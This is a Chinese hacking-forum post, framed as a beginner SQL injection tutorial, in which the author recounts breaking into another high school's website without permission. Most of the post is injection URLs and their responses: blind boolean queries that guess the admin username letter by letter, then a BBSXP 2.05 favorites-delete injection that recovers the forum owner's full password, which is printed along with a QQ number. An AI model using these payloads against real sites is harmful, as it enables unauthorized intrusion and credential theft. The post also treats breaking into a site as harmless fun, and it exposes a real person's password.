|
 | 作者: bridex [bridex]
 论坛用户 |
登录 |
| 原文含有SQL注入内容,只是文章标题太长,所以简短了些。。。 偶是如何当上本地另一高中的网管的 无聊的星期五晚上,发现州民高(我们本地的一所高中,与我们学校竞争全州第一)也有网页了,便 上去逛了逛,文章系统是动网的,有SQL注入,马上动手: http://www.XXXXX.com/wz/list.asp?id=102 and 11=(select id from admin where left(username,1)='a') 没有找到相关文章 http://www.XXXXX.com/wz/list.asp?id=102 and 11=(select id from admin where left(username,1)='b') 没有找到相关文章 ............... ............... ............... http://www.XXXXX.com/wz/list.asp?id=102 and 11=(select id from admin where left(username,1)='q') 出错!OH!YEAH!GO ON! http://www.XXXXX.com/wz/list.asp?id=102 and 11=(select id from admin where left(username,2)='qa') 没有找到相关文章 ............... ............... ............... http://www.XXXXX.com/wz/list.asp?id=102 and 11=(select id from admin where left(username,2)='qd') 出错!qd?论坛站长叫qdnmg,难道一样的名字?试试 http://www.XXXXX.com/wz/list.asp?id=102 and 11=(select id from admin where left(username,5)='qdnmg') 出错! OH!YEAH!来猜密码 http://www.XXXXX.com/wz/list.asp?id=102 and 11=(select id from admin where left(password,1)='a') 没有找到相关文章 ............... ............... ............... http://www.XXXXX.com/wz/list.asp?id=102 and 11=(select id from admin where left(password,1)='z') 没有找到相关文章 还不对?难道是数字? ............... ............... ............... http://www.XXXXX.com/wz/list.asp?id=102 and 11=(select id from admin where left(password,1)='1') 没有找到相关文章 http://www.XXXXX.com/wz/list.asp?id=102 and 11=(select id from admin where left(password,1)='0') 没有找到相关文章 偶彻底的跨了,难道是中文?麻烦~还是算了,一个文章系统浪费那么多时间真亏~~~!! 还是看看论坛有没有突破口吧~~然,BBSXP2.05,注册一个用户,然后到收藏里面增加一个网址,后查看 源文件查找del&id找到ID,del&id=1,先来测试一下是不是有这个漏洞如果成功删除就表示有这个漏洞。 成功删除说明有这个漏洞。 http://www.XXXXX.com/bbsxp/favorites.asp?menu=del&id=1 and 1=1 成功删除说明有这个漏洞。 GO!查询密码长度: 依然在添加网址,查询ID,ID=2,不重复说明了,测试中,被删除的收藏网址后都要在添加一个, http://www.XXXXX.com/bbsxp/favorites.asp?menu=del&id=2 and 1=(select count(*) from [user] where username='QDNMG' and len(userpass)='5') 没被删~ ............... ............... ............... http://www.XXXXX.com/bbsxp/favorites.asp?menu=del&id=2 and 1=(select count(*) from [user] where username='QDNMG' and len(userpass)='11') 删除了~ 昏~11位,够强~这下有得猜了~~~ 查询密码: 填加ID=3的网址收藏 http://www.XXXXX.com/bbsxp/favorites.asp?menu=del&id=3 and 1=(select count(*) from [user] where username='QDNMG' and mid(userpass,1,1)='a') 还在... ............... ............... ............... http://www.XXXXX.com/bbsxp/favorites.asp?menu=del&id=3 and 1=(select count(*) from [user] where username='QDNMG' and mid(userpass,1,1)='k') 成功~ 第一位密码:k 填加ID=4的网址收藏 http://www.XXXXX.com/bbsxp/favorites.asp?menu=del&id=3 and 1=(select count(*) from [user] where username='QDNMG' and mid(userpass,1,2)='ka') 还在... ............... ............... ............... http://www.XXXXX.com/bbsxp/favorites.asp?menu=del&id=3 and 1=(select count(*) from [user] where username='QDNMG' and mid(userpass,1,2)='kl')成功~ ............... ............... ............... ............... ............... ............... ............... ............... ............... ............... ............... ............... ............... ............... ............... ............... ............... ............... ............... ............... ............... ............... ............... ............... ............... ............... ............... 同样的方法猜完所有密码:kl2002qdnmg 登陆~OK 然后给管理员发邮件,并告诉他偶的QQ,晚上,他加我,并把我这个对手学校的高一新生拉去做管理员, 我昏~实在够菜 by KKKK |
| 地主 发表时间: 04-02-25 15:39 |
| 回复: bridex [bridex] 论坛用户 |
登录 |
|
K的QQ25193050 |
| B1层 发表时间: 04-02-25 15:42 |
|
20CN网络安全小组版权所有
Copyright © 2000-2010 20CN Security Group. All Rights Reserved.
论坛程序编写:NetDemon
粤ICP备05087286号
论坛: 黑客进阶 标题: SQL注入的一篇菜鸟教程